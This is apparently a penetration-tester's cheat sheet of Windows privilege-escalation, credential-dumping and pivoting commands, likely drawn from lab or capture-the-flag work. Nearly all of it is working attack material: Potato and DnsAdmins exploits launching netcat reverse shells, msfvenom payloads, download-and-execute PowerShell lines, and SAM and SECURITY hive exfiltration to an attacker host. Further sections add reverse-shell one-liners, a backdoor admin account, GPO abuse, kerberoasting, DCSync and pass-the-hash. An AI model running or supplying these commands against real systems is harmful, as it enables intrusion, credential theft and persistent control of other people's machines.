wmic process call create "\\$MYIP\$\jp32.exe -l 1337 -p \"cmd.exe\" -a \"/c \\$MYIP\$\nc.exe $MYIP 5566 -e cmd\"  -t * -c {3c6859ce-230b-48a4-be6c-932c0c202048}
wmic process call create "\\$MYIP\$\churrasco.exe -d \"\\$MYIP\$\nc.exe -e cmd.exe $MYIP 5566\""
xp_cmdshell c:\programdata\EfsPotato.exe "powershell -c C:\programdata\nc.exe $MYIP 5566 -e cmd"
xp_cmdshell c:\programdata\EfsPotato.exe "powershell -c type C:\Users\Administrator\Desktop\root.txt"

+---------- DnsAdmins ----------+
rlwrap nc -lvnp 5555
impacket-smbserver $ /Upload/windows
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$MYIP LPORT=5555 -f dll -o /Upload/windows/x.dll
dnscmd.exe /config /serverlevelplugindll \\$MYIP\$\x.dll

+---------- Malicious .lnk ----------+
curl http://$MYIP:8888/windows/nc.exe -o \programdata\nc.exe
powershell -c "$s = New-Object -ComObject WScript.Shell; $sc = $s.CreateShortcut('C:\Common Applications\Notepad.lnk'); $sc.TargetPath = 'C:\programdata\nc.exe'; $sc.Arguments = '$TARGET 5566 -e cmd.exe'; $sc.Save()"
powershell -c "$s = New-Object -ComObject WScript.Shell; $sc = $s.CreateShortcut('C:\Common Applications\Notepad.lnk'); $sc.TargetPath = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; $sc.Arguments = '\\$TARGET\\x'; $sc.Save()"

+---------- Enumerate Certificate Services ----------+
certutil -ADCA
certutil -user
certutil -CATemplates -config mist-DC01-CA
certutil -Template User

+---------- Shell From File ----------+
msfvenom -p windows/x64/exec CMD='powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQBy<SNIP>_WEB_DELIVERY' EXITFUNC=none -f dll > x.dll
msfvenom -p windows/x64/exec CMD='powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQBy<SNIP>_WEB_DELIVERY' EXITFUNC=none -f exe > x.exe
rlwrap nc -lvnp 5555
powershell -c "\programdata\bat2exe.bat $MYIP 5555; \programdata\x.exe"

+---------- Transfer Files from Windows ----------+
[Convert]::ToBase64String([IO.File]::ReadAllBytes((Get-Location).Path + "\file"))
echo '' | base64 -d > file

+---------- File Permissions ----------+
powershell -c "(Get-Acl 'C:\secret.txt').Access | Format-Table"
takeown /f "C:\secret.txt" && icacls "C:\secret.txt" /grant %USERNAME%:F /inheritance:e

+---------- Unquoted Paths ----------+
powershell -c "wmic service get name,displayname,pathname,startmode |findstr /i 'auto' |findstr /i /v 'c:\windows'"

+---------- Scheduled Tasks ----------+
powershell -c "$task = Get-ScheduledTask -TaskName 'Ownership'; $task.Actions; $task.Triggers; $task.Settings; $task | Format-List *"
powershell -c "Start-ScheduledTask -TaskName 'Ownership'"

+---------- Shell From Memory ----------+
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$MYIP LPORT=5555 -f psh -o 0.ps1
rlwrap msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST $MYIP; set LPORT 5555; run"
powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://$MYIP:8888/windows/0.ps1')"

+---------- Other Exploits ----------+
powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://$MYIP:8888/windows/Invoke-SigmaPotato.ps1');Invoke-SigmaPotato -Command \"whoami /user /priv\""
C:\programdata\FullPowers.exe -c "C:\programdata\EfsPotato.exe \"C:\programdata\nc.exe $MYIP 5566 -e cmd\"" -z
C:\programdata\jp32.exe -l 1337 -p "cmd.exe" -a "/c \programdata\nc.exe $MYIP 5678 -e cmd"  -t * -c {3c6859ce-230b-48a4-be6c-932c0c202048}
https://ohpe.it/juicy-potato/CLSID/
Windows Server 2008     {3c6859ce-230b-48a4-be6c-932c0c202048}     TrustedInstaller
Windows Server 2012     {3c6859ce-230b-48a4-be6c-932c0c202048}     TrustedInstaller
Windows Server 2016     {3c6859ce-230b-48a4-be6c-932c0c202048}     TrustedInstaller
Windows 7               {3c6859ce-230b-48a4-be6c-932c0c202048}     TrustedInstaller
Windows 8.1             {3c6859ce-230b-48a4-be6c-932c0c202048}     TrustedInstaller
Windows 10 Enterprise   {3c6859ce-230b-48a4-be6c-932c0c202048}     TrustedInstaller
Windows 10 Pro          {3c6859ce-230b-48a4-be6c-932c0c202048}     TrustedInstaller

+---------- Dump Hashes (Local / Remote) ----------+
net user dbf 123qweasdF! /add && net localgroup Administrators dbf /add

cd c:\programdata; reg save hklm\sam sam; reg save hklm\security security; reg save hklm\system system

iwr http://$MYIP:4444 -Method POST -InFile ".\sam"
cmd /c "nc.exe $MYIP 4444 -w 3 < sam"
nc -lvp 4444 > sam
iwr http://$MYIP:4444 -Method POST -InFile ".\security"
cmd /c "nc.exe $MYIP 4444 -w 3 < security"
nc -lvp 4444 > security
iwr http://$MYIP:4444 -Method POST -InFile ".\system"
cmd /c "nc.exe $MYIP 4444 -w 3 < system"
nc -lvp 4444 > system

nxc smb $TARGET -u 'dbf' -p '123qweasdF!' --local-auth --sam --lsa --dpapi

impacket-secretsdump -sam sam -system system -security security LOCAL
echo 'Administrator:500:...................' > hashes
hashcat -m 1000 -a 0 hashes $rockyou

powershell -c "(Get-WmiObject Win32_ComputerSystem).Domain"
impacket-secretsdump $DOM/'$USERNAME':'$PASSWORD'@$TARGET

+---------- Other ----------+
Get-WmiObject -Class Win32_ComputerSystem | Select-Object Domain
Get-ADComputer -Filter * | Select-Object Name
systeminfo | Select-String "Domain"
net view
net group "Domain Computers" /domain
net view /domain
net user /domain
wmic useraccount get name,sid
powershell -c "Set-ExecutionPolicy unrestricted"
services.msc

[*] Meterpreter
+---------- Initial Shell ----------+
-->> Standard
rlwrap msfconsole -q -x "use multi/handler; setg PAYLOAD windows/x64/meterpreter/reverse_tcp; setg LHOST $MYIP; setg LPORT 4444; run"

-->> Web Delivery
msfconsole -q -x 'use exploit/multi/script/web_delivery; setg SESSION 1; setg LHOST $MYIP; setg LPORT 8787; set TARGET PSH; setg PAYLOAD windows/x64/meterpreter/reverse_tcp; run'

+---------- Stored Credentials ----------+
run post/windows/gather/credentials/windows_autologin
run post/windows/gather/credentials/gpp
run post/windows/gather/enum_unattend
run post/windows/gather/credentials/enum_cred_store

+---------- Exploit Suggester ----------+
run multi/recon/local_exploit_suggester

+---------- Load Modules ----------+
load kiwi
load powershell

+---------- Initial Checks ----------+
powershell_execute "whoami /user /priv"
powershell_execute "cd \users; tree /a /f"
getsystem
sysinfo
ps
migrate

+---------- Installed Apps ----------+
powershell_execute "Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher"

+---------- Services and Unquoted Paths ----------+
powershell_execute "Get-Service | Where-Object { $_.CanStop -eq $true -and $_.DisplayName -notmatch 'Microsoft|Windows' } | Sort-Object DisplayName"
powershell_execute "wmic service get name,displayname,pathname,startmode |findstr /i 'auto' |findstr /i /v 'c:\windows'"

+---------- Scheduled Tasks ----------+
powershell_execute "Get-ScheduledTask | Where-Object {($_.Author -notmatch 'Microsoft') -and ($_.TaskPath -notmatch 'Microsoft')} | Select-Object TaskName, TaskPath, State, Author"
powershell_execute "$task = Get-ScheduledTask -TaskName 'Ownership'; $task.Actions; $task.Triggers; $task.Settings; $task; $filePath = $task.Actions.Execute; Get-Acl $filePath | Select-Object PSChildName, PSPath, AccessToString"
powershell_execute "Start-ScheduledTask -TaskName 'Ownership'"

+---------- PowerShell History ----------+
powershell_execute "type (Get-PSReadLineOption).HistorySavePath"

+---------- Network Environment ----------+
powershell_execute "powershell -c \"& { Get-NetTCPConnection -State Listen,Established | Where-Object { `$_."LocalAddress" -notin @('0.0.0.0','127.0.0.1') -and `$_."RemoteAddress" -notmatch '::' } | Sort-Object LocalAddress,LocalPort | Select-Object LocalAddress,LocalPort,RemoteAddress,RemotePort,State | Format-Table -AutoSize }\""
powershell_execute "arp -a"
powershell_execute "arp -a -N 10.1.5.4"
powershell_execute "route print"
powershell_execute "ipconfig /all"

+---------- Dumping ----------+
creds_all
hashdump
kiwi_cmd "lsadump::dcsync /domain:$DOM /all /csv"
run post/windows/gather/smart_hashdump
run post/windows/gather/lsa_secrets

+---------- File Permissions ----------+
powershell_execute "(Get-Acl 'C:\secret.txt').Access | Format-Table"
powershell_execute "takeown /f 'C:\secret.txt' && icacls 'C:\secret.txt' /grant %USERNAME%:F /inheritance:e"

+---------- Domain Environment ----------+
run post/windows/gather/enum_ad_users
run post/windows/gather/enum_ad_computers
run post/windows/gather/enum_domain
run post/windows/gather/enum_domains

+---------- Sessions and Jobs ----------+
background
sessions
sessions -i 1
jobs
jobs -k 1

[*] MSFVenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$MYIP LPORT=5555 -f exe -o 0.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$MYIP LPORT=5555 -f msi -o 0.msi
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$MYIP LPORT=5555 -f dll -o 0.dll
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$MYIP LPORT=5555 -f aspx -o 0.aspx
msfvenom -p php/x64/meterpreter/reverse_tcp LHOST=$MYIP LPORT=5555 -f raw -o 0.php
msfvenom -p python/x64/meterpreter/reverse_tcp LHOST=$MYIP LPORT=5555 -f raw -o 0.py

[*] Reverse Shells
php -r '$sock=fsockopen("$MYIP",5555);exec("/bin/sh -i <&3 >&3 2>&3");'
python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("$MYIP",5555)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
powershell -nop -c "$AtpsZlvw99=New-Object System.Net.Sockets.TCPClient('$MYIP',5555);$DqvVumCJ99=$AtpsZlvw99.GetStream();[byte[]]$bytes=0..65535|ForEach-Object{0};while(($i=$DqvVumCJ99.Read($bytes,0,$bytes.Length)) -ne 0){$data=(New-Object System.Text.ASCIIEncoding).GetString($bytes,0,$i);$fjVAQFpJ99=(Invoke-Expression $data 2>&1|Out-String);$vpVmHTLx99=$fjVAQFpJ99+'PS '+(Get-Location).Path+'> ';$BaZSdidm99=[System.Text.Encoding]::ASCII.GetBytes($vpVmHTLx99);$DqvVumCJ99.Write($BaZSdidm99,0,$BaZSdidm99.Length);$DqvVumCJ99.Flush()};$AtpsZlvw99.Close()"
powershell -nop -c "$sm=(New-Object Net.Sockets.TCPClient('$MYIP',5555)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}"

[*] Powerview
Import-Module ./PowerView.ps1
Get-NetDomain
Get-LocalUser
Get-ADuser gpoadm | ForEach-Object {Get-ACL "AD:\$($_.DistinguishedName)" | Select-Object -ExpandProperty Owner}
Set-DomainObjectOwner -Identity gpoadm -OwnerIdentity Amelia.Griffiths
Add-DomainObjectAcl -TargetIdentity gpoadm -PrincipalIdentity Amelia.Griffiths -Rights All
Set-DomainUserPassword -Identity gpoadm -AccountPassword (ConvertTo-SecureString "123qweasdF!" -AsPlainText -Force)
python3 pygpoabuse.py -dc-ip $TARGET $DOM/'gpoadm':'123qweasdF!' -gpo-id '31b2f340-016d-11d2-945f-00c04fb984f9' -command 'mshta http://10.8.5.79:8080/buqT7ygPVm.hta'
gpoupdate /force
Set-DomainObject -Identity $USERNAME -SET @{serviceprincipalname='SET/SET'}; Get-DomainSPNTicket -spn SET/SET

[*] Rubeus
Rubeus.exe kerberoast
nano hashes; cat hashes | awk '{$1=$1}1' | tr -d '\n' | tee hashes; john hashes -w=$rockyou --format=krb5tgs
Rubeus.exe asreproast
nano hashes; cat hashes | awk '{$1=$1}1' | tr -d '\n' | tee hashes; john hashes -w=$rockyou --format=krb5asrep

# Pivoting
## Linux
## Windows
[*] Meterpreter
+---------- Create Route ----------+
run post/multi/manage/autoroute

+---------- Discover Hosts ----------+
run post/windows/gather/enum_domain
run auxiliary/scanner/netbios/nbname RHOSTS=10.10.10.0/24 BATCHSIZE=32 THREADS=24

+---------- Port Scan Hosts ----------+
background
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.1.5.3
set PORTS 21,22,23,53,88,135,389,445,1433,2049,3306,3389,5985
set CONCURRENCY 20
set TIMEOUT 20
set THREADS 20

+---------- Setup Socks Proxy ----------+
run auxiliary/server/socks_proxy SRVHOST=127.0.0.1 SRVPORT=9050 VERSION=4a
cp /etc/proxychains.conf /etc/proxychains.conf.backup
echo "socks4 127.0.0.1 9050" >> /etc/proxychains.conf ; nano /etc/proxychains.conf

+---------- Scan Services ----------+
proxychains nmap -Pn -n -sT 10.1.5.3 --open -p 21,22,23,53,88,135,389,445,1433,2049,3306,3389,5985 -g53

+---------- Attacking Internal Hosts ----------+
use exploit/windows/smb/psexec
set LHOST 10.10.10.3
set RHOSTS 10.10.10.1-2
set SMBUser Administrator
set SMBPass be77c30f5bb90694f6fd9e48f380c9c3:6aa6bca0dafa60871fa5ecaf2217e05f
run

+---------- Managing Routes ----------+
route
run post/multi/manage/autoroute ACTION=delete
jobs -v
jobs -k 0

+---------- Port Forwarding ----------+
portfwd add -l 65001 -r 10.10.10.1 -p 445
portfwd add -l 65002 -r 10.10.10.2 -p 445
portfwd add -l 65020 -r 10.10.10.20 -p 445
portfwd add -l 65200 -r 10.10.10.200 -p 445
portfwd list
portfwd flush

[*] Manual
arp -a
for /L %i in (1,1,254) do ping -n 1 192.168.1.%i

[*] Pass The Hash
meterpreter> hashdump
DUMP=''
echo "$DUMP" | cut -d ':' -f 1 >> usernames; cat usernames | sort -u | tee usernames
echo "$DUMP" | cut -d ':' -f 3- | sed 's/::.*//' >> hashes; cat hashes | sort -u | tee hashes

+---------- Proxychains ----------+
proxychains nxc smb 10.129.121.240 -u usernames -H hashes -x 'net user sysadm 123qweasdF!'
proxychains nxc smb 10.10.10.1 10.10.10.2 -u usernames -H hashes --local-auth --continue-on-success | grep '\[+\]'
proxychains nxc smb 10.10.10.2 -u '$USERNAME' -H '$HASH' --local-auth --sam | grep ':[0-9]\+:[a-f0-9]\{32\}:[a-f0-9]\{32\}:::' | awk '{print $NF}'
proxychains nxc smb 10.10.10.2 -u '$USERNAME' -H '$HASH' --local-auth --sam --lsa --dpapi --ntds
proxychains nxc smb 10.10.10.2 -u '$USERNAME' -H '$HASH' --local-auth -M reg-winlogon -M lsassy -M powershell_history

+---------- Impacket ----------+
impacket-psexec -dc-ip $TARGET $DOM/'$USERNAME':'$PASSWORD'@$TARGET
impacket-wmiexec -dc-ip $TARGET $DOM/'$USERNAME':'$PASSWORD'@$TARGET
impacket-smbexec -dc-ip $TARGET $DOM/'$USERNAME':'$PASSWORD'@$TARGET
impacket-atexec -dc-ip $TARGET $DOM/'$USERNAME':'$PASSWORD'@$TARGET "whoami /all"
impacket-atexec -hashes '$HASH' '$USERNAME'@$TARGET "whoami /all"
impacket-psexec -hashes '$HASH' '$USERNAME'@$TARGET "whoami /all"
impacket-wmiexec -hashes '$HASH' '$USERNAME'@$TARGET "whoami /all"
impacket-smbexec -hashes '$HASH' '$USERNAME'@$TARGET "whoami /all"
